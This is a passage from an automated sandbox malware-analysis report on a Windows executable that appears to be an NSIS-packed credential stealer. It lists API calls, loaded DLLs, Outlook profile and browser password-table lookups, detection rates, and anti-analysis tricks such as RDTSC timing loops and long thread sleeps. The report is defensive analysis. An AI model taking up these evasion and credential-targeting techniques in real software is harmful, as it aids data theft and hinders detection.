            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeCode function: 0_2_004032A0 EntryPoint,LdrInitializeThunk,SetErrorMode,GetVersion,#17,OleInitialize,LdrInitializeThunk,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,LdrInitializeThunk,GetTempPathW,LdrInitializeThunk,GetTempPathW,GetWindowsDirectoryW,lstrcatW,LdrInitializeThunk,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,LdrInitializeThunk,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004032A0
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeCode function: 3_2_004032A0 EntryPoint,LdrInitializeThunk,SetErrorMode,GetVersion,#17,OleInitialize,LdrInitializeThunk,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,LdrInitializeThunk,GetTempPathW,LdrInitializeThunk,GetTempPathW,GetWindowsDirectoryW,lstrcatW,LdrInitializeThunk,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,LdrInitializeThunk,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,3_2_004032A0
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeCode function: 0_2_004045B4 GetDlgItem,SetWindowTextW,LdrInitializeThunk,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,LdrInitializeThunk,MulDiv,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,SetDlgItemTextW,0_2_004045B4
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeCode function: 0_2_00402095 LdrInitializeThunk,CoCreateInstance,LdrInitializeThunk,LdrInitializeThunk,0_2_00402095
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetensJump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeMutant created: NULL
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeFile created: C:\Users\user\AppData\Local\Temp\nsl2B81.tmpJump to behavior
            Source: m0CZ8H4jfl.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: m0CZ8H4jfl.exe, 00000003.00000002.2662284317.00000000357ED000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: m0CZ8H4jfl.exeVirustotal: Detection: 72%
            Source: m0CZ8H4jfl.exeReversingLabs: Detection: 60%
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeFile read: C:\Users\user\Desktop\m0CZ8H4jfl.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\m0CZ8H4jfl.exe "C:\Users\user\Desktop\m0CZ8H4jfl.exe"
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeProcess created: C:\Users\user\Desktop\m0CZ8H4jfl.exe "C:\Users\user\Desktop\m0CZ8H4jfl.exe"
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeProcess created: C:\Users\user\Desktop\m0CZ8H4jfl.exe "C:\Users\user\Desktop\m0CZ8H4jfl.exe"Jump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeSection loaded: shfolder.dllJump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeSection loaded: riched20.dllJump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeSection loaded: usp10.dllJump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeSection loaded: msls31.dllJump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
            Source: Benchership141.lnk.0.drLNK file: ..\..\..\mindevrdigt\boghandlermedhjlperens.tor
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: m0CZ8H4jfl.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

            Data Obfuscation

            barindex
            Source: Yara matchFile source: 00000000.00000002.1793597999.0000000004978000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.2635144470.0000000003638000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeCode function: 0_2_10001B18 LdrInitializeThunk,GlobalAlloc,LdrInitializeThunk,LdrInitializeThunk,lstrcpyW,lstrcpyW,GlobalFree,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,GlobalFree,GlobalFree,GlobalFree,GlobalFree,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,GlobalFree,LdrInitializeThunk,lstrcpyW,LdrInitializeThunk,LdrInitializeThunk,GetModuleHandleW,LdrInitializeThunk,LoadLibraryW,GetProcAddress,lstrlenW,0_2_10001B18
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeCode function: 0_2_10002DE0 push eax; ret 0_2_10002E0E
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeCode function: 3_2_0015A487 push dword ptr [ebp+ecx-75h]; retf 3_2_0015A492
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeCode function: 3_2_0015A4F9 push dword ptr [ebp+ebx-75h]; iretd 3_2_0015A4FD
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeCode function: 3_2_347477DE push edx; retf 3_2_347477EB
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeFile created: C:\Users\user\AppData\Local\Temp\nsw2CAB.tmp\System.dllJump to dropped file
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeAPI/Special instruction interceptor: Address: 4D02460
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeAPI/Special instruction interceptor: Address: 39C2460
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeRDTSC instruction interceptor: First address: 4CC96B4 second address: 4CC96B4 instructions: 0x00000000 rdtsc 0x00000002 test eax, ebx 0x00000004 test bl, al 0x00000006 cmp ebx, ecx 0x00000008 jc 00007F0F090DC114h 0x0000000a cmp dh, ch 0x0000000c inc ebp 0x0000000d inc ebx 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeRDTSC instruction interceptor: First address: 39896B4 second address: 39896B4 instructions: 0x00000000 rdtsc 0x00000002 test eax, ebx 0x00000004 test bl, al 0x00000006 cmp ebx, ecx 0x00000008 jc 00007F0F08E05AA4h 0x0000000a cmp dh, ch 0x0000000c inc ebp 0x0000000d inc ebx 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeMemory allocated: 110000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeMemory allocated: 347C0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeMemory allocated: 367C0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeThread delayed: delay time: 599874Jump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeThread delayed: delay time: 599766Jump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeThread delayed: delay time: 599641Jump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeThread delayed: delay time: 599500Jump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeThread delayed: delay time: 599374Jump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeThread delayed: delay time: 599265Jump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeThread delayed: delay time: 599081Jump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeThread delayed: delay time: 598909Jump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeThread delayed: delay time: 598768Jump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeThread delayed: delay time: 598641Jump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeThread delayed: delay time: 598532Jump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeThread delayed: delay time: 598407Jump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeThread delayed: delay time: 598282Jump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeThread delayed: delay time: 598157Jump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeThread delayed: delay time: 598032Jump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeThread delayed: delay time: 597907Jump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeThread delayed: delay time: 597797Jump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeThread delayed: delay time: 597688Jump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeThread delayed: delay time: 597563Jump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeThread delayed: delay time: 597438Jump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeThread delayed: delay time: 597313Jump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeThread delayed: delay time: 597188Jump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeThread delayed: delay time: 597079Jump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeThread delayed: delay time: 596954Jump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeThread delayed: delay time: 596829Jump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeThread delayed: delay time: 596704Jump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeThread delayed: delay time: 596579Jump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeThread delayed: delay time: 596454Jump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeThread delayed: delay time: 596305Jump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeThread delayed: delay time: 596201Jump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeThread delayed: delay time: 596094Jump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeThread delayed: delay time: 595983Jump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeThread delayed: delay time: 595871Jump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeThread delayed: delay time: 595766Jump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeThread delayed: delay time: 595657Jump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeThread delayed: delay time: 595532Jump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeThread delayed: delay time: 595407Jump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeThread delayed: delay time: 595282Jump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeThread delayed: delay time: 595157Jump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeThread delayed: delay time: 595032Jump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeThread delayed: delay time: 594922Jump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeThread delayed: delay time: 594813Jump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeThread delayed: delay time: 594688Jump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeThread delayed: delay time: 594563Jump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeThread delayed: delay time: 594438Jump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeThread delayed: delay time: 594313Jump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeThread delayed: delay time: 594203Jump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeThread delayed: delay time: 594087Jump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeThread delayed: delay time: 593985Jump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeThread delayed: delay time: 593875Jump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeWindow / User API: threadDelayed 2423Jump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeWindow / User API: threadDelayed 7394Jump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsw2CAB.tmp\System.dllJump to dropped file
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exeAPI coverage: 3.7 %
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exe TID: 7892Thread sleep count: 33 > 30Jump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exe TID: 7892Thread sleep time: -30437127721620741s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exe TID: 7892Thread sleep time: -600000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exe TID: 7900Thread sleep count: 2423 > 30Jump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exe TID: 7892Thread sleep time: -599874s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exe TID: 7900Thread sleep count: 7394 > 30Jump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exe TID: 7892Thread sleep time: -599766s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exe TID: 7892Thread sleep time: -599641s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exe TID: 7892Thread sleep time: -599500s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exe TID: 7892Thread sleep time: -599374s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exe TID: 7892Thread sleep time: -599265s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exe TID: 7892Thread sleep time: -599081s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exe TID: 7892Thread sleep time: -598909s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exe TID: 7892Thread sleep time: -598768s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exe TID: 7892Thread sleep time: -598641s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exe TID: 7892Thread sleep time: -598532s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exe TID: 7892Thread sleep time: -598407s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exe TID: 7892Thread sleep time: -598282s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exe TID: 7892Thread sleep time: -598157s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\m0CZ8H4jfl.exe TID: 7892Thread sleep time: -598032s >= -30000sJump to behavior
